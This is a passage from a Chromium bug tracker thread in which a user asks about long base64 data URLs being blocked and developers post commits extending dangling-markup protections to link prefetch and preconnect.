[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/BaseFetchContext.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/FrameLoader.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/gurl_unittest.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_etc.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_relative.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util_unittest.cc

Comment 13 by antlafra...@gmail.com, Jun 23 2017 

I got the deprecation warning in Chrome 59. So in the future it wont be possible to split long base64 urls?
Are there alternatives to avoid writing very long code lines?
Thanks

Example:
<image xlink:href="data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/
sABFEdWNreQABAAQAAAALAAD/4QM0aHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQg
YmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zO
ng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjMtYzAxMSA2Ni4xNDU2Nj
EsIDIwMTIvMDIvMDYtMTQ6NTY6MjcgICAgICAgIC...(some thousands more characters)"/>

Comment 14 by mkwst@chromium.org, Jul 3 2017

Labels: M-61
Status: Fixed (was: Assigned)
#13: We carved `data` out from what we're actually shipping in M61. If you try your page on Canary, you shouldn't see that URL being blocked.

Comment 15 by antlafra...@gmail.com, Jul 3 2017 

It works in Canary. Thanks

Comment 16 by mkwst@chromium.org, Jul 3 2017

Blocking: 738849
Project Member

Comment 17 by bugdroid1@chromium.org, Aug 11 2017 

The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/682b16cc3fd2316946670f25f38a9abba6827fe4

commit 682b16cc3fd2316946670f25f38a9abba6827fe4
Author: Mike West <mkwst@chromium.org>
Date: Fri Aug 11 14:27:38 2017

Apply dangling markup restrictions to `<link>`.

`preconnect`, `dns-prefetch`, and `prefetch` were all inadvertantly
bypassing the danging markup mitigations we landed for "actual" resource
requests. This patch resolves that oversight.

Bug:  680970 , 695474, 749852
Change-Id: Ic2a262d062a92830b1869b3fb3183280156f3c0a
Reviewed-on: https://chromium-review.googlesource.com/571785
Commit-Queue: Mike West <mkwst@chromium.org>
Reviewed-by: Yoav Weiss <yoav@yoav.ws>
Cr-Commit-Position: refs/heads/master@{#493728}
[modify] https://crrev.com/682b16cc3fd2316946670f25f38a9abba6827fe4/chrome/test/data/webui/i18n_process_test.html
[add] https://crrev.com/682b16cc3fd2316946670f25f38a9abba6827fe4/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/link-prefetch-expected.txt
[add] https://crrev.com/682b16cc3fd2316946670f25f38a9abba6827fe4/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/link-prefetch.html
[modify] https://crrev.com/682b16cc3fd2316946670f25f38a9abba6827fe4/third_party/WebKit/Source/core/html/HTMLLinkElement.cpp
[modify] https://crrev.com/682b16cc3fd2316946670f25f38a9abba6827fe4/third_party/WebKit/Source/core/loader/LinkLoader.cpp
Project Member

Comment 18 by bugdroid1@chromium.org, Aug 18 2017

Labels: merge-merged-3163
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/9aa51a5d91811c1009a9a1655ed8c935504e2f76

commit 9aa51a5d91811c1009a9a1655ed8c935504e2f76
Author: Mike West <mkwst@chromium.org>
Date: Fri Aug 18 07:23:34 2017

Apply dangling markup restrictions to `<link>`.

`preconnect`, `dns-prefetch`, and `prefetch` were all inadvertantly
bypassing the danging markup mitigations we landed for "actual" resource
requests. This patch resolves that oversight.

TBR=mkwst@chromium.org

(cherry picked from commit 682b16cc3fd2316946670f25f38a9abba6827fe4)

Bug:  680970 , 695474, 749852
Change-Id: Ic2a262d062a92830b1869b3fb3183280156f3c0a
Reviewed-on: https://chromium-review.googlesource.com/571785
Commit-Queue: Mike West <mkwst@chromium.org>
Reviewed-by: Yoav Weiss <yoav@yoav.ws>
Cr-Original-Commit-Position: refs/heads/master@{#493728}
Reviewed-on: https://chromium-review.googlesource.com/620587
Reviewed-by: Mike West <mkwst@chromium.org>
Cr-Commit-Position: refs/branch-heads/3163@{#671}
Cr-Branched-From: ff259bab28b35d242e10186cd63af7ed404fae0d-refs/heads/master@{#488528}
[modify] https://crrev.com/9aa51a5d91811c1009a9a1655ed8c935504e2f76/chrome/test/data/webui/i18n_process_test.html
[add] https://crrev.com/9aa51a5d91811c1009a9a1655ed8c935504e2f76/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/link-prefetch-expected.txt
[add] https://crrev.com/9aa51a5d91811c1009a9a1655ed8c935504e2f76/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/link-prefetch.html
[modify] https://crrev.com/9aa51a5d91811c1009a9a1655ed8c935504e2f76/third_party/WebKit/Source/core/html/HTMLLinkElement.cpp
[modify] https://crrev.com/9aa51a5d91811c1009a9a1655ed8c935504e2f76/third_party/WebKit/Source/core/loader/LinkLoader.cpp

Sign in to add a comment